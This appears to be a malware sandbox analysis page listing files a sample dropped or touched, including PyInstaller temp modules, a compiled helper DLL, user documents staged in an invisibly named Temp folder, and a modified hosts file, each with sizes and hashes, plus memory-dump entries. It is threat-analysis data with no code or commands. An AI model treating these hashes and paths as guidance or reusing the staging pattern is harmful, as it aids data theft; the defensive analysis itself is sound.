00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8762\select.pyd

Filesize
24KB

MD5
2ca53c62ba75c2b21ca49b3d0e8ac757

SHA1
b09ffa6e5c5644ad1c1c47052e53543e17b7b46a

SHA256
6268b09e202aa2b751486a1d7118de5fc02c77e80f5d877e8db55c6cac7b3a4e

SHA512
9ff78713084865dc84a2f76161f2c9421eb59d169cf5bba1b21c029a33c4afcd942af2205c8b3d6bd7f7b3d846680ec210d5bf9fc7173a2c82f26bac331c8ecd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8762\sqlite3.dll

Filesize
606KB

MD5
6ce3b8392af15d64cebeb291e0c3b9db

SHA1
f2f6857cbf1f19738258102de6ecbf24f335a1c1

SHA256
016084394280afc12c6a4e61ae2fb869811694f469ba485923a7b1d1fab27744

SHA512
6c9f0dfec3e94fecc1059366e2804e3c1a2ca6e731ccde64e7be19d4196157ac15df5766f27883e9eb739a50c93a0018e1cc88d07513b5e3247f8063080979de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8762\unicodedata.pyd

Filesize
288KB

MD5
29417c15da3318f5f718ec3eae52df5a

SHA1
f50421c598d1333472a72f503529e7d3dedb7a4a

SHA256
069446ab5793b69cd3e990243bf6f5570da00c452ce84e65abb4c129f7996339

SHA512
cb25630da4005294c693d9eb213cdc1011864712c93cca3bbfa58ff107fe3d8554835926a2dc0e450a57fedc04e832f3fdadc80093d44929def1fb6ef023fb67

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3k5lt0s.e2h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vpoplfqc\vpoplfqc.dll

Filesize
4KB

MD5
1b16f4cb24606a529d430a82170c46d8

SHA1
6de9e37083378da9e1f39eb3b659ce98b6b6ef25

SHA256
01c1497e9dc847913ceeef42d98ab5c76a6ee9c8a2d3647d75f3f6c873ce7481

SHA512
dc3d2edacf98d218e7f88df473e1743f3a3409dc7bc8a6b21a3696e17f0b75abccf2da5f367ebdd604494092bb0d0906d9adfe896ac0bcf93d8ae5c73fcfa31f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\ConfirmFormat.xlsx

Filesize
9KB

MD5
3876ce8a9834346125d774c71a9156b5

SHA1
0fa11f9596bcc015709b0d735c43fb58a0e397e8

SHA256
0bf4f699e1269aaecf078e9398a967ddc11bb72fb4fff7c4a7d41787e4815cb2

SHA512
4e995609cd7fdeb1ae16526c4039a58a4c8e0113074b0b8e770547fa03e8ef23a36a870201e9c1f375c122cf5eda429fd9cad5480475d8ae72244da3b0ee1dc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\HideSend.docx

Filesize
13KB

MD5
0cb58cf28b7f67849ff7ad5907421161

SHA1
13962cfe5e0fb9c075fe13b69cc78d25b4d21455

SHA256
48db747f67a94bc5be0fd8d51805a908be14ae86481b5c44f4cb4a5369b1019f

SHA512
67e763d36f2c69601e66828b790c2ae10355b930fb1a8949cca3550c98877a764fd4c453f83e9218aee92c1c4a6e580053c0f6c5e1bedaf821859624fdd54578

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\JoinPing.docx

Filesize
16KB

MD5
c0b3a43186b0260b06e1fc078ef014c2

SHA1
390bec58afa46371ac98a03fb4f1c60409fe282d

SHA256
fd7485ee551feeceb220b1e2c81394135962b8f3a82dff71c5f197c2766ecd7e

SHA512
9d285b51dfb08932f7aca30ce5fad5bcea3254b3e616aa02460e080139bb2fc74ca5a6092911c94064eb231eb32572f63a6036581fe82286da42744aa96747bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\OptimizeUse.xlsx

Filesize
11KB

MD5
390a99c778ef9f8ef1c90ca1d386e679

SHA1
b14dad2289cb0e2e5ac437088d3b1e4532a236f1

SHA256
7e3c8bfc3f4f24bb30e6f730e40894e9b9b06529ad8b1fa0cc5a8576f81946dd

SHA512
132a779510bc9641b2086ba53eff73fd664860605795044b585486d4701f51e1f055e77a442a29c22b2dd3c2305849291d893a8eac5a834dab19e660fd0eb777

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\ResumeConfirm.xlsx

Filesize
571KB

MD5
9be879593e22bd5cb1ecd8af794e7565

SHA1
d1265fda3b14569c9cc05ba37cd7c7dff8d09a11

SHA256
bf4dc6976fa6601eadef57d3050d48d9da34037b029eb473fc6047f7eec30419

SHA512
c7193f92b128c6bb142a001ec1d332474be9f6b5f1b9da42cecd83e98ce8043caf7825107f3f713c0207fbd829b9fd202e0d788936e58b6f2602634b06cbc31f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\UnblockClear.xlsx

Filesize
14KB

MD5
a0d7a0c433644c274a11d13050aed735

SHA1
a581b11b6c9e012e597cd21ddf410082119f976a

SHA256
a32ff51e5be3241014ab31ebb22e30cb43af18aa5120b38c74298263f11f060f

SHA512
6872fcac4b0ba9ef93c81349c93fd5f928b46a4db6a92167d50cca542a6a3000e225ea6caa2610924a6920b1ad0196995f3b1f7dc83fff6c6063ededf2d97248

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\CloseLimit.docx

Filesize
13KB

MD5
7356e94bcbcf6ae34a0e923e1250ae6c

SHA1
c4d52cd503b2d93431bf486da68e7bdcb19b06e7

SHA256
d346c3ae735eb56266a6cf42cf6c67597a211ace2901634270d1f03e1a5e57a7

SHA512
c66679a359af435b0978ab5661d7f81bc409f4254cf76393c499fd82404ef838006444efdebdeaee78a289c0ece68d5ee3918a0adbf5385bbbaf5437d4a15542

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\LimitRepair.docx

Filesize
1.0MB

MD5
b314d5af41bfd9dcc86a37f97af37894

SHA1
21a7e30bfaa882ca6ab7724af326b8f62810a649

SHA256
b6043439d21491c9e7401502b04908619df1e900ceb7bbf080ad3f6b75a14d5a

SHA512
f5e737b05df6f00b6c5b904f4edb1ff86acde819a8306f65eb762da28c937465993f3497d06c3723823f6c6ad586c04652f912a8b6ed001e0e041437b753f466

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\LimitResolve.doc

Filesize
1.2MB

MD5
da5f33959f57b1eb909720fc836a0e26

SHA1
802681522fea18fb1ad0dacf4652489493d41cb9

SHA256
402ad7b54af5d236c98ad860a2388b5e16e822f06e917c38d0fbcd46f4d07fd7

SHA512
0439d828d67f0fdfce44d8fdf2e335c05766516a9fdbd437fdffd48282589b8ee8357a928458d59b483045727d179676e755e1229eefdd18680ddf001eec7d4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\SplitSelect.docx

Filesize
16KB

MD5
4e907db20d763466299ed06d7dd8d2d9

SHA1
11736312a9d1c0a78e311290a23eac82f2fc5b78

SHA256
ae029e235f3e07f76ce8edd52681d86779ec14e9de29597bef829b17e19109c9

SHA512
53262553ddaaa32ff59b87072e02640f238505ff059538b5ba40b38855c41447bc3c00dd3d850c8978c48be7140c0d035f3baa22a17ec3d37e2d5b7e279b4d65

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\StepSkip.xlsx

Filesize
12KB

MD5
2ad5ed1afe30851c8de4b6de0d1cadc5

SHA1
306ffb8a8d2049b8bd4d6d83c4bab74f9b5ccf28

SHA256
3b4dca57e682a1ac6d10c32d6aff664e42ad7651c916789de4d71240c692fafd

SHA512
f4bd59a06e820bc2f2cec42ae38490fba045f4b53c40748956c3d5097c60508883dace6ffbd054ee7441e342a619d52687fdd81dca271032b5ae4d411b1b937d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\SwitchUnlock.xlsx

Filesize
1.6MB

MD5
396fcefa66b01bfe5f0def44215f62a9

SHA1
92511ab63b02f07e601c09cdfa9d9cf9422e6793

SHA256
fa48c2860f3a32d9ef01fe2dd94560b03f3d97827e0321d1c2a0e36b2d02e89d

SHA512
1b220b95cb2d35ec52e07645b94bafecee0663d6abaeb91a8d40dc43a544c5df3b56f8c80e3ae9363beb226f2e6a3e035f68fd525991391677d14b7dc77ce9a3

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vpoplfqc\CSC12D33C2EE19E4AEE815AB86DD8FC1F51.TMP

Filesize
652B

MD5
f43452fdf2d271ff195876fcbf092a23

SHA1
b1d094aa40517828b951e26591fb39de10a181ec

SHA256
58510d1d74d60c7cfea95af77a96b846b145d4a43319ffd0df3e027ceaea2ead

SHA512
1c71b8b967614729f4c6aeb2cb7c5885649cfd7dba1e39d843aced951caa76021db73c848fb2eac4ffdf9cbdcb717292f13f54c032ceab4c1c30c0bf42b23de3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vpoplfqc\vpoplfqc.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vpoplfqc\vpoplfqc.cmdline

Filesize
607B

MD5
9d212e9670af3c6b8831aa456d958dda

SHA1
be656de210f470b7a4f427c144c1ed2cc393e8e9

SHA256
cf8018cd050163fce434ece71e9315db037eb38faafe7492ffa46aa1c0e76846

SHA512
3274711eac4b18abeb36778bd64aa9dab281d63df5d9124947d86d779564d03d21a0b9adf003ed15e027316c0678154b6ee699311e7e77ee69af5779ee8f5103

Download Submit
memory/2468-30-0x00007FF98C750000-0x00007FF98C774000-memory.dmp

Filesize
144KB

Download
memory/2468-25-0x00007FF978770000-0x00007FF978BDF000-memory.dmp

Filesize
4.4MB

Download
memory/2468-108-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp

Filesize
124KB

Download
memory/2468-352-0x00007FF977E10000-0x00007FF978185000-memory.dmp

Filesize
3.5MB

Download
memory/2468-81-0x00007FF98CF70000-0x00007FF98CF89000-memory.dmp

Filesize
100KB

Download
memory/2468-82-0x00007FF978260000-0x00007FF978378000-memory.dmp

Filesize
1.1MB

Download
memory/2468-78-0x00007FF98B4B0000-0x00007FF98B4DD000-memory.dmp

Filesize
180KB

Download
memory/2468-79-0x00007FF98B7E0000-0x00007FF98B7ED000-memory.dmp

Filesize
52KB

Download
memory/2468-76-0x00007FF98B3B0000-0x00007FF98B3C4000-memory.dmp

Filesize
80KB

Download
memory/2468-353-0x00007FF98C750000-0x00007FF98C774000-memory.dmp

Filesize
144KB

Download
memory/2468-70-0x00007FF978770000-0x00007FF978BDF000-memory.dmp

Filesize
4.4MB

Download
memory/2468-242-0x00007FF98C680000-0x00007FF98C699000-memory.dmp

Filesize
100KB

Download
memory/2468-71-0x00007FF987760000-0x00007FF987818000-memory.dmp

Filesize
736KB

Download
memory/2468-282-0x00007FF988100000-0x00007FF98812E000-memory.dmp

Filesize
184KB

Download
memory/2468-73-0x00007FF977E10000-0x00007FF978185000-memory.dmp

Filesize
3.5MB

Download
memory/2468-72-0x0000016BA71C0000-0x0000016BA7535000-memory.dmp

Filesize
3.5MB

Download
memory/2468-74-0x00007FF98C750000-0x00007FF98C774000-memory.dmp

Filesize
144KB

Download
memory/2468-66-0x00007FF988100000-0x00007FF98812E000-memory.dmp

Filesize
184KB

Download
memory/2468-64-0x00007FF98B810000-0x00007FF98B81D000-memory.dmp

Filesize
52KB

Download
memory/2468-62-0x00007FF98C680000-0x00007FF98C699000-memory.dmp

Filesize
100KB

Download
memory/2468-60-0x00007FF987900000-0x00007FF987A69000-memory.dmp

Filesize
1.4MB

Download
memory/2468-58-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp

Filesize
124KB

Download
memory/2468-56-0x00007FF98CF70000-0x00007FF98CF89000-memory.dmp

Filesize
100KB

Download
memory/2468-54-0x00007FF98B4B0000-0x00007FF98B4DD000-memory.dmp

Filesize
180KB

Download
memory/2468-48-0x00007FF98F4E0000-0x00007FF98F4EF000-memory.dmp

Filesize
60KB

Download
memory/2468-122-0x00007FF987900000-0x00007FF987A69000-memory.dmp

Filesize
1.4MB

Download
memory/2468-298-0x00007FF987760000-0x00007FF987818000-memory.dmp

Filesize
736KB

Download
memory/2468-299-0x0000016BA71C0000-0x0000016BA7535000-memory.dmp

Filesize
3.5MB

Download
memory/2468-301-0x00007FF977E10000-0x00007FF978185000-memory.dmp

Filesize
3.5MB

Download
memory/2468-335-0x00007FF978260000-0x00007FF978378000-memory.dmp

Filesize
1.1MB

Download
memory/2468-327-0x00007FF987900000-0x00007FF987A69000-memory.dmp

Filesize
1.4MB

Download
memory/2468-326-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp

Filesize
124KB

Download
memory/2468-321-0x00007FF978770000-0x00007FF978BDF000-memory.dmp

Filesize
4.4MB

Download
memory/2468-322-0x00007FF98C750000-0x00007FF98C774000-memory.dmp

Filesize
144KB

Download
memory/2468-337-0x00007FF978770000-0x00007FF978BDF000-memory.dmp

Filesize
4.4MB

Download
memory/2468-365-0x00007FF978260000-0x00007FF978378000-memory.dmp

Filesize
1.1MB

Download
memory/2468-364-0x00007FF98B7E0000-0x00007FF98B7ED000-memory.dmp

Filesize
52KB

Download
memory/2468-363-0x00007FF98B3B0000-0x00007FF98B3C4000-memory.dmp

Filesize
80KB

Download
memory/2468-362-0x00007FF987760000-0x00007FF987818000-memory.dmp

Filesize
736KB

Download
memory/2468-361-0x00007FF988100000-0x00007FF98812E000-memory.dmp

Filesize
184KB

Download
memory/2468-360-0x00007FF98B810000-0x00007FF98B81D000-memory.dmp

Filesize
52KB

Download
memory/2468-359-0x00007FF98C680000-0x00007FF98C699000-memory.dmp

Filesize
100KB

Download
memory/2468-358-0x00007FF987900000-0x00007FF987A69000-memory.dmp

Filesize
1.4MB

Download
memory/2468-357-0x00007FF98C730000-0x00007FF98C74F000-memory.dmp

Filesize
124KB

Download
memory/2468-356-0x00007FF98CF70000-0x00007FF98CF89000-memory.dmp

Filesize
100KB

Download
memory/2468-355-0x00007FF98B4B0000-0x00007FF98B4DD000-memory.dmp

Filesize
180KB

Download
memory/2468-354-0x00007FF98F4E0000-0x00007FF98F4EF000-memory.dmp

Filesize
60KB

Download
memory/3196-221-0x000001EF56460000-0x000001EF56468000-memory.dmp

Filesize
32KB

Download
memory/4764-93-0x000001D2C9490000-0x000001D2C94B2000-memory.dmp

Filesize
136KB

Download